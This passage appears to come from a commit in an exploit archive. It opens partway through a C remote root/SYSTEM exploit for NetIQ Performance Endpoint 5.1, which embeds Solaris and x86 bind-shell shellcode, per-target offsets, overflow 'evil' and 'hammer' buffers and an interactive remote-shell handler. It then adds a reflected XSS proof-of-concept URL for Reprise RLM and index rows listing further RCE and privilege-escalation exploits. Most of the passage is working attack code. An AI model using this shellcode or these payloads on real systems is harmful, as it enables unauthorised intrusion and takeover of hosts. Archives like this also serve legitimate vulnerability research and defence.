"\xc0\x23\xbf\xf4\x92\x23\xa0\x10\x94\x10\x20\x10\x82\x10\x20\xe8"
"\x91\xd0\x20\x08\xd0\x03\xbf\xf8\x92\x10\x20\x01\x82\x10\x20\xe9"
"\x91\xd0\x20\x08\xd0\x03\xbf\xf8\x92\x1a\x40\x09\x94\x12\x40\x09"
"\x82\x10\x20\xea\x91\xd0\x20\x08\xd0\x23\xbf\xf8\x94\x10\x20\x03"
"\x92\x10\x20\x09\x94\xa2\xa0\x01\x82\x10\x20\x3e\x91\xd0\x20\x08"
"\x12\xbf\xff\xfc\xd0\x03\xbf\xf8\x94\x1a\xc0\x0b\x21\x0b\xd8\x9a"
"\xa0\x14\x21\x6e\x23\x0b\xdc\xda\x90\x23\xa0\x10\x92\x23\xa0\x08"
"\xe0\x3b\xbf\xf0\xd0\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b"
"\x91\xd0\x20\x08";
static char solaris_x86_bind[] =
"\xb8\xff\xff\xff\xff\xba\xfd\xff\xd8\xef\xf7\xd0\xf7\xd2\x50\x52"
"\x89\xe7\x31\xdb\xf7\xe3\xb0\x02\x50\x52\x52\x50\x50\x50\xb0\xe6"
"\xcd\x91\x93\x6a\x10\x57\x53\x52\xb0\xe8\xcd\x91\x52\x53\x52\xb0"
"\xe9\xcd\x91\x52\x53\x6a\x02\xb0\xea\xcd\x91\x93\x92\x99\x59\x51"
"\x52\xb0\x06\xcd\x91\x51\x6a\x09\x53\x52\xb0\x3e\xcd\x91\x83\xc4"
"\x18\x49\x79\xeb\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89"
"\xe3\x52\x53\x89\xe1\x52\x52\x51\x53\x52\xb0\x3b\xcd\x91";
#define NUM_TARGETS 7
#define ARCH_X86 0
#define ARCH_SPARC 1
struct target_t
{
const char *name;
const char *zshell;
const int zshell_len;
const int zshell_pkt_len;
const int fp_indx;
const int fp_offset;
const int arch;
};
struct target_t targets[] = {
{ "NetIQ Endpoint 5.1.15750 - Microsoft Windows (universal)",
win32_x86_bind, sizeof win32_x86_bind, 0x11c0, 33, 0x490, ARCH_X86 },
{ "NetIQ Endpoint 5.1.15541 - Microsoft Windows (universal)",
win32_x86_bind, sizeof win32_x86_bind, 0x11c0, 33, 0x490, ARCH_X86 },
{ "NetIQ Endpoint 5.1.15368 - Microsoft Windows (universal)",
win32_x86_bind, sizeof win32_x86_bind, 0x11c0, 33, 0x488, ARCH_X86 },
{ "NetIQ Endpoint 5.1 - Microsoft Windows (universal)",
win32_x86_bind, sizeof win32_x86_bind, 0x11c0, 33, 0x480, ARCH_X86 },
{ "NetIQ Endpoint 5.1 - FreeBSD (universal)",
freebsd_x86_bind, sizeof freebsd_x86_bind, 0x11c0, 29, 0x3FC, ARCH_X86 },
{ "NetIQ Endpoint 5.1 - Solaris SPARC (universal)",
solaris_sparc_bind, sizeof solaris_sparc_bind, 0x1080, 29, 0x400, ARCH_SPARC },
{ "NetIQ Endpoint 5.1 - Solaris x86 (universal)",
solaris_x86_bind, sizeof solaris_x86_bind, 0x11c0, 29, 0x400, ARCH_X86 },
{0}
};
static const char *quotes[] = {
" \"No executable code (like Java or Visual Basic) is sent. There is no way\n"
" to do something like 'run this command.' 100,000s of endpoints have been\n"
" installed worldwide without incident.\"",
" \"Endpoints do rigorous internal validation. For example, endpoints are not\n"
" susceptible to 'buffer overrun' attacks used by hackers.\""
};
static int verbose = 1; /* verbosity */
static int ppid, cpid; /* parent and child process id's */
static int get_localip_getifaddrs (in_addr_t *);
static int sock_send (int, char *, int);
static int sock_recv (int, char *, int);
static int sock_recv_str (int, char *, int);
static void shellami (int);
static void
fatal (void)
{
kill (0, SIGKILL);
exit (EXIT_FAILURE);
}
static int
get_localip_getifaddrs (in_addr_t *ip_addr)
{
struct ifaddrs *ifa_head;
int result;
result = -1;
if (getifaddrs (&ifa_head) == 0)
{
struct ifaddrs *ifa_cur;
for (ifa_cur = ifa_head; ifa_cur; ifa_cur = ifa_cur->ifa_next)
{
if (ifa_cur->ifa_name != NULL && ifa_cur->ifa_addr != NULL)
{
if (ifa_cur->ifa_addr->sa_family != AF_INET ||
!(ifa_cur->ifa_flags & IFF_UP))
continue;
if (ifa_cur->ifa_flags & IFF_LOOPBACK)
continue;
memcpy (ip_addr,
&((struct sockaddr_in *) ifa_cur->ifa_addr)->sin_addr,
sizeof *ip_addr);
result = 0;
break;
}
}
freeifaddrs (ifa_head);
}
return (result);
}
static int
sock_send (int fd, char *src, int len)
{
int n;
if ((n = send (fd, src, len, 0)) < 0)
{
perror ("send()");
exit (EXIT_FAILURE);
}
return (n);
}
static int
sock_recv (int fd, char *dst, int len)
{
int n;
if ((n = recv (fd, dst, len, 0)) < 0)
{
perror ("recv()");
exit (EXIT_FAILURE);
}
return (n);
}
static int
sock_recv_str (int fd, char *dst, int len)
{
int n = sock_recv (fd, dst, len - 1);
dst[n] = '\0';
return (n);
}
static void
shellami (int fd)
{
int n;
fd_set rset;
char rbuf[1024];
while (1)
{
FD_ZERO (&rset);
FD_SET (fd, &rset);
FD_SET (STDIN_FILENO, &rset);
if (select (fd + 1, &rset, NULL, NULL, NULL) < 0)
{
perror ("select()");
fatal ();
}
if (FD_ISSET (fd, &rset))
{
if ((n = sock_recv_str (fd, rbuf, sizeof (rbuf) - 1)) <= 0)
{
fprintf (stderr, "Connection closed by foreign host.\n");
exit (EXIT_SUCCESS);
}
printf ("%s", rbuf);
fflush (stdout);
}
if (FD_ISSET (STDIN_FILENO, &rset))
{
if ((n = read (STDIN_FILENO, rbuf, sizeof (rbuf) - 1)) > 0)
{
rbuf[n] = '\0';
sock_send (fd, rbuf, n);
}
}
}
}
static int
sockami (char *host, int port)
{
struct sockaddr_in address;
struct hostent *hp;
int fd;
fflush (stdout);
if ((fd = socket (AF_INET, SOCK_STREAM, 0)) == -1)
{
perror ("socket()");
exit (EXIT_FAILURE);
}
if ((hp = gethostbyname (host)) == NULL)
{
perror ("gethostbyname()");
exit (EXIT_FAILURE);
}
memset (&address, 0, sizeof (address));
memcpy ((char *) &address.sin_addr, hp->h_addr, hp->h_length);
address.sin_family = AF_INET;
address.sin_port = htons (port);
if (connect (fd, (struct sockaddr *) &address, sizeof (address)) < 0)
{
perror ("connect()");
return (-1);
}
return (fd);
}
int
endpt_add_string (char *buf, char *str)
{
unsigned int str_len;
unsigned short str_lens;
assert (buf != NULL && str != NULL);
str_len = 2 + strlen (str) + 1;
str_lens = htons (str_len);
/* add the string length and copy, including NULL */
*((unsigned short *) buf) = str_lens;
memcpy (buf + 2, str, str_len - 2);
return (str_len);
}
char *
endpt_read_packet (int fd, char *buf)
{
unsigned short pkt_len;
int n;
n = sock_recv (fd, (char *) &pkt_len, sizeof pkt_len);
if (n < 2)
{
fprintf (stderr, "endpt_read_packet: failed reading length!\n");
return (NULL);
}
pkt_len = ntohs (pkt_len);
if (pkt_len > ENDPT_PKTMAX)
{
fprintf (stderr, "endpt_read_packet: invalid packet length!\n");
return (NULL);
}
n = sock_recv (fd, buf, pkt_len - 2);
if (n < pkt_len - 2)
{
fprintf (stderr, "endpt_read_packet: failed reading packet (%d read, need %d)!\n", n, pkt_len);
return (NULL);
}
return (buf);
}
char *
endpt_create_packet (char *buf, unsigned int len)
{
char *pkt_buf;
unsigned int pkt_len;
unsigned short pkt_lens;
assert (buf != NULL && len > 0);
assert (len <= UINT_MAX - 2);
assert (len <= ENDPT_PKTMAX - 2);
pkt_len = 2 + len;
pkt_buf = malloc (pkt_len * sizeof (char));
if (pkt_buf == NULL)
return (NULL);
pkt_lens = htons (pkt_len);
/* add the packet length and copy */
*((unsigned short *) pkt_buf) = pkt_lens;
memcpy (pkt_buf + 2, buf, len);
return (pkt_buf);
}
void
endpt_listen_child (char *thost, struct target_t *trgt)
{
struct sockaddr_in servaddr, cliaddr;
char pkt_buf[ENDPT_PKTMAX-2], *pkt_ptr, *ptr;
unsigned int var_30_ptr;
int lfd, cfd, sfd, pid;
socklen_t clilen;
sleep (1);
pid = getpid ();
if ((lfd = socket (PF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
{
perror ("socket()");
fatal ();
}
memset (&servaddr, 0, sizeof servaddr);
servaddr.sin_family = AF_INET;
servaddr.sin_addr.s_addr = htonl (INADDR_ANY);
servaddr.sin_port = htons (ENDPT_TCP_PORT);
if (bind (lfd, (struct sockaddr *) &servaddr, sizeof servaddr) < 0)
{
perror ("bind()");
fatal ();
}
if (listen (lfd, 2) < 0)
{
perror ("listen()");
fatal ();
}
clilen = sizeof cliaddr;
if ((cfd = accept (lfd, (struct sockaddr *) &cliaddr, &clilen)) < 0)
{
perror ("accept()");
fatal ();
}
printf ("[child-%d] connection accepted from %s:%d\n",
pid, inet_ntoa (cliaddr.sin_addr), ntohs (cliaddr.sin_port));
printf ("[child-%d] reading first packet...", pid);
/* read dummy packet */
if ((ptr = endpt_read_packet (cfd, pkt_buf)) == NULL)
{
close (cfd);
fatal ();
}
printf ("done\n");
printf ("[child-%d] sending first reply...", pid);
pkt_ptr = endpt_create_packet (cpkt_buf1, sizeof cpkt_buf1 - 1);
sock_send (cfd, pkt_ptr, (sizeof cpkt_buf1 - 1) + 2);
free (pkt_ptr);
printf ("done\n");
printf ("[child-%d] reading second packet...", pid);
/* read dummy packet */
if ((ptr = endpt_read_packet (cfd, pkt_buf)) == NULL)
{
close (cfd);
fatal ();
}
printf ("done\n");
printf ("[child-%d] reading third packet...", pid);
if ((ptr = endpt_read_packet (cfd, pkt_buf)) == NULL)
{
close (cfd);
fatal ();
}
memcpy (&var_30_ptr, pkt_buf + 3, sizeof var_30_ptr);
printf ("done\n");
printf ("[child-%d] MAGIC COOKIE: 0x%08x\n", pid, var_30_ptr);
memcpy (&cpkt_buf2[3], &var_30_ptr, sizeof var_30_ptr);
printf ("[child-%d] reading fourth packet...", pid);
/* read dummy packet */
if ((ptr = endpt_read_packet (cfd, pkt_buf)) == NULL)
{
close (cfd);
fatal ();
}
printf ("done\n");
printf ("[child-%d] reading fifth packet...", pid);
if ((ptr = endpt_read_packet (cfd, pkt_buf)) == NULL)
{
close (cfd);
fatal ();
}
memcpy (&var_30_ptr, pkt_buf + 3, sizeof var_30_ptr);
printf ("done\n");
printf ("[child-%d] MAGIC COOKIE: 0x%08x\n", pid, var_30_ptr);
memcpy (&cpkt_buf2[3], &var_30_ptr, sizeof var_30_ptr);
printf ("[child-%d] sending second reply...", pid);
pkt_ptr = endpt_create_packet (cpkt_buf2, sizeof cpkt_buf2 - 1);
sock_send (cfd, pkt_ptr, (sizeof cpkt_buf2 - 1) + 2);
free (pkt_ptr);
printf ("done\n");
printf ("[child-%d] sending evil buffer...", pid);
ptr = pkt_buf;
if (trgt->arch == ARCH_X86)
{
memcpy (ptr, x86_evil_len, sizeof x86_evil_len);
ptr += sizeof x86_evil_len - 1;
memset (ptr, X86_NOP_BYTE, 0x11c0 - 2);
}
else if (trgt->arch == ARCH_SPARC)
{
int i;
for (i = 0; i < 2; i++, ptr += sizeof sparc_evil_len - 1)
memcpy (ptr, sparc_evil_len, sizeof sparc_evil_len);
for (i = 0; i < 80; i++, ptr += sizeof sparc_nop - 1)
memcpy (ptr, sparc_nop, sizeof sparc_nop);
}
else
{
fprintf (stderr, "opps\n");
exit (EXIT_FAILURE);
}
memcpy (&pkt_buf[256], trgt->zshell, trgt->zshell_len - 1);
sock_send (cfd, pkt_buf, trgt->zshell_pkt_len);
printf ("done\n");
printf ("[child-%d] sending hammer buffer...", pid);
ptr = pkt_buf;
memcpy (ptr, hammer_buf, sizeof hammer_buf);
memcpy (&pkt_buf[5], &var_30_ptr, sizeof var_30_ptr);
if (trgt->arch == ARCH_SPARC)
var_30_ptr = ntohl (var_30_ptr);
var_30_ptr -= trgt->fp_offset - 0x08;
if (trgt->arch == ARCH_SPARC)
var_30_ptr = htonl (var_30_ptr);
memcpy (&pkt_buf[trgt->fp_indx], &var_30_ptr, sizeof var_30_ptr);
sock_send (cfd, pkt_buf, sizeof hammer_buf - 1);
printf ("done\n");
printf ("[child-%d] waiting for the shellcode to be executed...\n", pid);
sleep (3);
if ((sfd = sockami (thost, PORT_SHELL)) != -1)
{
printf ("+Wh00t!\n\n");
shellami (sfd);
}
sleep (1);
close (cfd);
}
void
endpt_parent (char *thost)
{
struct in_addr ip_addr;
char ip_buf[IPV4_BUFLEN], pkt_buf[ENDPT_PKTMAX-2], *pkt_ptr, *ptr;
int fd;
get_localip_getifaddrs (&ip_addr.s_addr);
strncpy (ip_buf, inet_ntoa (ip_addr), sizeof ip_buf);
ip_buf[sizeof ip_buf - 1] = '\0';
if (verbose)
fprintf (stderr, "[parent-%d] source address %s\n", ppid, ip_buf);
fflush (stdout);
printf ("[parent-%d] connecting to %s:%d...", ppid, thost, ENDPT_TCP_PORT);
if ((fd = sockami (thost, ENDPT_TCP_PORT)) < 0)
fatal ();
printf ("done\n");
printf ("[parent-%d] building first packet...", ppid);
ptr = pkt_buf;
memcpy (ptr, ppkt_buf1, sizeof ppkt_buf1);
ptr += sizeof ppkt_buf1 - 1;
/* add the connect-back IP */
ptr += endpt_add_string (ptr, ip_buf);
memcpy (ptr, ppkt_buf1_end, sizeof ppkt_buf1_end);
ptr += sizeof ppkt_buf1_end - 1;
pkt_ptr = endpt_create_packet (pkt_buf, ptr - pkt_buf);
printf ("done\n");
sock_send (fd, pkt_ptr, (ptr - pkt_buf) + 2);
free (pkt_ptr);
printf ("[parent-%d] building second packet...", ppid);
ptr = pkt_buf;
memcpy (ptr, ppkt_buf2, sizeof ppkt_buf2);
ptr += sizeof ppkt_buf2 - 1;
/* add the connect-back IP */
ptr += endpt_add_string (ptr, ip_buf);
memcpy (ptr, ppkt_buf2_end, sizeof ppkt_buf2_end);
ptr += sizeof ppkt_buf2_end - 1;
pkt_ptr = endpt_create_packet (pkt_buf, ptr - pkt_buf);
printf ("done\n");
sock_send (fd, pkt_ptr, (ptr - pkt_buf) + 2);
printf ("[parent-%d] building third packet...done\n", ppid);
sock_send (fd, pkt_ptr, (ptr - pkt_buf) + 2);
free (pkt_ptr);
sleep (2);
printf ("[parent-%d] closing socket...done\n", ppid);
close (fd);
}
int
main (int argc, char **argv)
{
struct target_t *trgt;
int i, cret;
printf ("NetIQ Performance Endpoint <=5.1 remote root/SYSTEM exploit\n"
"by: <mu-b@digit-labs.org>\n"
"http://www.digit-labs.org/ -- Digit-Labs 2007!@$!\n\n");
if (argc <= 2)
{
fprintf (stderr, "Usage: %s <host> <target>\n", argv[0]);
for (i = 0; targets[i].name; i++)
fprintf (stderr, "\t%d) %s\n", i, targets[i].name);
fprintf (stderr, "\n");
exit (EXIT_SUCCESS);
}
if (atoi (argv[2]) >= NUM_TARGETS)
{
fprintf (stderr, "Only %d targets known!!\n", NUM_TARGETS);
exit (EXIT_SUCCESS);
}
trgt = &targets[atoi (argv[2])];
printf ("Target: %s\n\n", trgt->name);
srand (time (NULL));
printf ("%s\n\t- https://tinyurl.com/lgmblyj\n\n", quotes[rand() & 1]);
ppid = getpid ();
if ((cpid = fork ()) < 0)
{
perror ("fark()");
exit (EXIT_FAILURE);
}
else if (cpid == 0)
{
/* child */
endpt_listen_child (argv[1], trgt);
exit (EXIT_SUCCESS);
}
/* parent */
endpt_parent (argv[1]);
/* wait for child */
wait (&cret);
if (verbose)
fprintf (stderr, "[parent-%d] child-%d exited %d\n", ppid, cpid, cret);
return (EXIT_SUCCESS);
}

16
exploits/windows/webapps/51188.txt Normal file
View file

@ -0,0 +1,16 @@
# Exploit Title: Reprise Software RLM v14.2BL4 - Cross-Site Scripting (XSS)
# Exploit Author: Mohammed A.Siledar
# Author Company : reprisesoftware
# Version: rlm.v14.2BL4
# Vendor home page : https://reprisesoftware.com
# Software Link: https://www.reprisesoftware.com/license_admin_kits/rlm.v14.2BL4-x64_w3.admin.exe
# Authentication Required: No
# CVE : CVE-2022-30519
# Tested on: Windows 10
# Proof Of Concept:
http://localhost/goform/login_process?username=admin&password=admin%22%3E%3Cimg%20src=x%20onerror=confirm(123)%3E
Best Regards.

18
files_exploits.csv
View file

@ -1813,6 +1813,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
48124,exploits/aspx/webapps/48124.txt,"DotNetNuke 9.5 - Persistent Cross-Site Scripting",2020-02-24,"Sajjad Pourali",webapps,aspx,,2020-02-24,2020-02-24,0,,,,,http://www.exploit-db.comDNN_Platform_9.5.0_Install.zip,
43405,exploits/aspx/webapps/43405.rb,"DotNetNuke DreamSlider 01.01.02 - Arbitrary File Download (Metasploit)",2017-12-27,"Glafkos Charalambous",webapps,aspx,,2017-12-27,2017-12-28,0,,,,,,
45577,exploits/aspx/webapps/45577.txt,"Ektron CMS 9.20 SP2 - Improper Access Restrictions",2018-10-10,alt3kx,webapps,aspx,,2018-10-10,2018-10-10,0,CVE-2018-12596,,,,,
51200,exploits/aspx/webapps/51200.txt,"ELSI Smart Floor V3.3.3 - Stored Cross-Site Scripting (XSS)",2023-04-01,"Rob_ CTRL Group",webapps,aspx,,2023-04-01,2023-04-01,0,CVE-2022-35543,,,,,
44831,exploits/aspx/webapps/44831.txt,"EMS Master Calendar < 8.0.0.20180520 - Cross-Site Scripting",2018-06-04,"Chris Barretto",webapps,aspx,,2018-06-04,2018-06-05,0,CVE-2018-11628,,,,,
49508,exploits/aspx/webapps/49508.txt,"H8 SSRMS - 'id' IDOR",2021-02-01,"Mohammed Farhan",webapps,aspx,,2021-02-01,2021-02-01,0,,,,,,
42687,exploits/aspx/webapps/42687.txt,"ICEstate 1.1 - 'id' SQL Injection",2017-09-13,"Ihsan Sencan",webapps,aspx,,2017-09-13,2017-09-13,0,,,,,,
@ -3624,6 +3625,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
41895,exploits/hardware/remote/41895.rb,"Huawei HG532n - Command Injection (Metasploit)",2017-04-19,Metasploit,remote,hardware,,2017-04-19,2017-04-19,1,,"Command Injection",,,,https://github.com/rapid7/metasploit-framework/blob/3b38d0d9005255a8a06522bd0505eeab95aace5a/modules/exploits/linux/http/huawei_hg532n_cmdinject.rb
38663,exploits/hardware/remote/38663.txt,"Huawei HG630a / HG630a-50 - Default SSH Admin Password on ADSL Modems",2015-11-10,"Murat Sahin",remote,hardware,,2015-11-10,2017-11-10,0,OSVDB-130098,,,,,
9503,exploits/hardware/remote/9503.txt,"Huawei SmartAX MT880 - Multiple Cross-Site Request Forgery Vulnerabilities",2009-08-24,"Jerome Athias",remote,hardware,,2009-08-23,,1,OSVDB-56875,,,,,
51190,exploits/hardware/remote/51190.txt,"Hughes Satellite Router HX200 v8.3.1.14 - Remote File Inclusion",2023-04-01,LiquidWorm,remote,hardware,,2023-04-01,2023-04-01,0,,,,,,
19538,exploits/hardware/remote/19538.txt,"Hybrid Networks Cable Broadband Access System 1.0 - Remote Configuration",1999-10-05,KSR[T],remote,hardware,,1999-10-05,2012-07-02,1,CVE-1999-0791;OSVDB-1100,,,,,https://www.securityfocus.com/bid/695/info
27706,exploits/hardware/remote/27706.txt,"IBM 1754 GCM 1.18.0.22011 - Remote Command Execution",2013-08-19,"Alejandro Alvarez Bravo",remote,hardware,,2013-08-19,2013-08-19,0,CVE-2013-0526;OSVDB-96389,,,,,
44048,exploits/hardware/remote/44048.md,"Ichano AtHome IP Cameras - Multiple Vulnerabilities",2017-12-19,SecuriTeam,remote,hardware,,2018-02-15,2018-02-15,0,CVE-2017-17761,,,,,https://blogs.securiteam.com/index.php/archives/3576
@ -3764,6 +3766,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
41236,exploits/hardware/remote/41236.py,"Netwave IP Camera - Password Disclosure",2017-02-03,spiritnull,remote,hardware,,2017-02-03,2017-02-03,0,,,,,,
19444,exploits/hardware/remote/19444.txt,"Network Security Wizards Dragon-Fire IDS 1.0 - Command Execution",1999-08-05,"Stefan Lauda",remote,hardware,,1999-08-05,2017-11-15,1,CVE-1999-0913;OSVDB-47,,,,,https://www.securityfocus.com/bid/564/info
9658,exploits/hardware/remote/9658.txt,"Neufbox NB4-R1.5.10-MAIN - Persistent Cross-Site Scripting",2009-09-14,"599eme Man",remote,hardware,,2009-09-13,,1,,,,,,
51195,exploits/hardware/remote/51195.py,"Nexxt Router Firmware 42.103.1.5095 - Remote Code Execution (RCE) (Authenticated)",2023-04-01,"Yerodin Richards",remote,hardware,,2023-04-01,2023-04-01,0,CVE-2022-44149,,,,,
25966,exploits/hardware/remote/25966.txt,"Nokia Affix 2.0/2.1/3.x - BTSRV/BTOBEX Remote Command Execution",2005-07-12,"Kevin Finisterre",remote,hardware,,2005-07-12,2013-06-05,1,CVE-2005-2277;OSVDB-17853,,,,,https://www.securityfocus.com/bid/14232/info
1081,exploits/hardware/remote/1081.c,"Nokia Affix < 3.2.0 - btftp Remote Client",2005-07-03,"Kevin Finisterre",remote,hardware,,2005-07-02,,1,OSVDB-17852;CVE-2005-2250,,,,,
22533,exploits/hardware/remote/22533.txt,"Nokia IPSO 3.4.x - Voyager ReadFile.TCL Remote File Reading",2003-04-24,"Jonas Eriksson",remote,hardware,,2003-04-24,2012-11-07,1,,,,,,https://www.securityfocus.com/bid/7426/info
@ -3888,6 +3891,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
38492,exploits/hardware/remote/38492.html,"TP-Link TL-WR1043N Router - Cross-Site Request Forgery",2013-04-24,"Jacob Holcomb",remote,hardware,,2013-04-24,2015-10-19,1,CVE-2013-2645;OSVDB-92547,,,,,https://www.securityfocus.com/bid/59442/info
38308,exploits/hardware/remote/38308.txt,"TP-Link TL-WR2543ND Router - Admin Panel Multiple Cross-Site Request Forgery Vulnerabilities",2013-02-08,"Juan Manuel Garcia",remote,hardware,,2013-02-08,2016-09-12,1,,,,,,https://www.securityfocus.com/bid/57877/info
36945,exploits/hardware/remote/36945.txt,"TP-Link TL-WR740N 111130 - 'ping_addr' HTML Injection",2012-03-12,l20ot,remote,hardware,,2012-03-12,2015-05-08,1,OSVDB-80038,,,,,https://www.securityfocus.com/bid/52424/info
51192,exploits/hardware/remote/51192.py,"TP-Link TL-WR902AC firmware 210730 (V3) - Remote Code Execution (RCE) (Authenticated)",2023-04-01,"Tobias Müller",remote,hardware,,2023-04-01,2023-04-01,0,CVE-2022-48194,,,,,
46678,exploits/hardware/remote/46678.py,"TP-LINK TL-WR940N / TL-WR941ND - Buffer Overflow",2019-04-09,"Grzegorz Wypych",remote,hardware,80,2019-04-09,2019-04-09,0,CVE-2019-6989,,,,,
48994,exploits/hardware/remote/48994.py,"TP-Link WDR4300 - Remote Code Execution (Authenticated)",2020-11-05,"Patrik Lantz",remote,hardware,,2020-11-05,2020-11-05,0,CVE-2017-13772,,,,,
34184,exploits/hardware/remote/34184.txt,"Trend Micro Interscan Web Security Virtual Appliance - Multiple Vulnerabilities",2010-06-14,"Ivan Huertas",remote,hardware,,2010-06-14,2014-07-28,1,,,,,,https://www.securityfocus.com/bid/41072/info
@ -4336,6 +4340,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
48972,exploits/hardware/webapps/48972.txt,"Genexis Platinum-4410 P4410-V2-1.28 - Cross Site Request Forgery to Reboot",2020-10-29,"Mohammed Farhan",webapps,hardware,,2020-10-29,2020-10-29,0,,,,,,
49709,exploits/hardware/webapps/49709.txt,"Genexis Platinum-4410 P4410-V2-1.31A - 'start_addr' Persistent Cross-Site Scripting",2021-03-25,"Jithin KS",webapps,hardware,,2021-03-25,2021-03-25,0,,,,,,
37258,exploits/hardware/webapps/37258.py,"GeoVision (GeoHttpServer) Webcams - Remote File Disclosure",2015-06-10,"Viktor Minin",webapps,hardware,,2015-06-10,2015-06-10,0,OSVDB-123189,,,,,
51179,exploits/hardware/webapps/51179.txt,"GeoVision Camera GV-ADR2701 - Authentication Bypass",2023-04-01,"Chan Nyein Wai",webapps,hardware,,2023-04-01,2023-04-01,0,,,,,,
50211,exploits/hardware/webapps/50211.txt,"GeoVision Geowebserver 5.3.3 - Local FIle Inclusion",2021-08-17,"Ken Pyle",webapps,hardware,,2021-08-17,2021-10-29,0,,,,,,
45065,exploits/hardware/webapps/45065.txt,"GeoVision GV-SNVR0811 - Directory Traversal",2018-07-22,"Berk Dusunur",webapps,hardware,,2018-07-22,2018-07-23,0,,Traversal,,,,
44957,exploits/hardware/webapps/44957.rb,"Geutebruck 5.02024 G-Cam/EFD-2250 - 'simple_loglistjs.cgi' Remote Command Execution (Metasploit)",2018-07-02,RandoriSec,webapps,hardware,80,2018-07-02,2018-07-02,0,,"Metasploit Framework (MSF)",,http://www.exploit-db.com/screenshots/idlt45000/screen-shot-2018-07-02-at-115352.png,,
@ -5253,6 +5258,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
44422,exploits/java/local/44422.py,"H2 Database - 'Alias' Arbitrary Code Execution",2018-04-09,gambler,local,java,,2018-04-09,2018-04-09,1,,,,,http://www.exploit-db.comh2-2017-06-10.zip,https://mthbernardes.github.io/rce/2018/03/14/abusing-h2-database-alias.html
49384,exploits/java/local/49384.txt,"H2 Database 1.4.199 - JNI Code Execution",2021-01-06,1F98D,local,java,,2021-01-06,2021-01-08,1,,,,,,
42283,exploits/java/remote/42283.rb,"ActiveMQ < 5.14.0 - Web Shell Upload (Metasploit)",2017-06-29,Metasploit,remote,java,,2017-06-29,2017-06-30,1,CVE-2016-3088,,,,http://www.exploit-db.comapache-activemq-5.11.1-bin.zip,https://github.com/rapid7/metasploit-framework/blob/43d8c4c5e7450d46eba2f18e6e0b6ba70c6dc671/modules/exploits/multi/http/apache_activemq_upload_jsp.rb
51183,exploits/java/remote/51183.txt,"AD Manager Plus 7122 - Remote Code Execution (RCE)",2023-04-01,"Chan Nyein Wai",remote,java,,2023-04-01,2023-04-01,0,CVE-2021-44228,,,,,
39643,exploits/java/remote/39643.rb,"Apache Jetspeed - Arbitrary File Upload (Metasploit)",2016-03-31,Metasploit,remote,java,8080,2016-03-31,2016-03-31,1,CVE-2016-0710;CVE-2016-0709,"Metasploit Framework (MSF)",,,,
50592,exploits/java/remote/50592.py,"Apache Log4j 2 - Remote Code Execution (RCE)",2021-12-14,kozmer,remote,java,,2021-12-14,2021-12-15,0,CVE-2021-44228,,,,,
50590,exploits/java/remote/50590.py,"Apache Log4j2 2.14.1 - Information Disclosure",2021-12-14,leonjza,remote,java,,2021-12-14,2021-12-14,0,CVE-2021-44228,,,,,
@ -6860,6 +6866,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
19517,exploits/linux/local/19517.pl,"Emesene 2.12.5 - Password Disclosure",2012-07-01,"Daniel Godoy",local,linux,,2012-07-01,2015-07-12,0,OSVDB-83766,,,,http://www.exploit-db.comemesene_2.12.3-dfsg-1ubuntu1_all.deb,
34537,exploits/linux/local/34537.txt,"EncFS 1.6.0 - Flawed CBC/CFB Cryptography Implementation",2010-08-26,"Micha Riser",local,linux,,2010-08-26,2019-03-28,1,CVE-2010-3073;OSVDB-68076,,,,,https://www.securityfocus.com/bid/42779/info
9627,exploits/linux/local/9627.txt,"Enlightenment - Linux Null PTR Dereference Framework",2009-09-10,spender,local,linux,,2009-09-09,,1,,,2009-enlightenment.tgz,,,
51180,exploits/linux/local/51180.txt,"Enlightenment v0.25.3 - Privilege escalation",2023-04-01,nu11secur1ty,local,linux,,2023-04-01,2023-04-01,0,CVE-2022-37706,,,,,
1029,exploits/linux/local/1029.c,"ePSXe 1.6.0 - 'nogui()' Local Privilege Escalation",2005-06-04,Qnix,local,linux,,2005-06-03,2017-11-16,1,OSVDB-17145,,,,,
19602,exploits/linux/local/19602.c,"Eric Allman Sendmail 8.8.x - Socket Hijack",1999-11-05,"Michal Zalewski",local,linux,,1999-11-05,2012-07-05,1,OSVDB-83789,,,,,https://www.securityfocus.com/bid/774/info
22190,exploits/linux/local/22190.txt,"ESCPUtil 1.15.2 2 - Printer Name Local Buffer Overflow",2003-01-21,"Karol Wiesek",local,linux,,2003-01-21,2012-10-28,1,,,,,,https://www.securityfocus.com/bid/6658/info
@ -8767,6 +8774,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
46629,exploits/linux/webapps/46629.txt,"CentOS Web Panel 0.9.8.789 - NameServer Field Persistent Cross-Site Scripting",2019-03-29,DKM,webapps,linux,,2019-03-29,2019-03-29,0,CVE-2019-10261,"Cross-Site Scripting (XSS)",,,,
46669,exploits/linux/webapps/46669.txt,"CentOS Web Panel 0.9.8.793 (Free) / 0.9.8.753 (Pro) - Cross-Site Scripting",2019-04-08,DKM,webapps,linux,,2019-04-08,2019-05-01,0,CVE-2019-10893,"Cross-Site Scripting (XSS)",,,,
46784,exploits/linux/webapps/46784.txt,"CentOS Web Panel 0.9.8.793 (Free) / v0.9.8.753 (Pro) / 0.9.8.807 (Pro) - Domain Field (Add DNS Zone) Cross-Site Scripting",2019-05-01,DKM,webapps,linux,,2019-05-01,2019-05-01,0,CVE-2019-11429,"Cross-Site Scripting (XSS)",,,,
51194,exploits/linux/webapps/51194.txt,"Centos Web Panel 7 v0.9.8.1147 - Unauthenticated Remote Code Execution (RCE)",2023-04-01,"numan türle",webapps,linux,,2023-04-01,2023-04-01,0,CVE-2022-44877,,,,,
48212,exploits/linux/webapps/48212.txt,"Centos WebPanel 7 - 'term' SQL Injection",2020-03-13,"Berke YILMAZ",webapps,linux,,2020-03-13,2020-03-18,0,CVE-2020-10230,,,,,
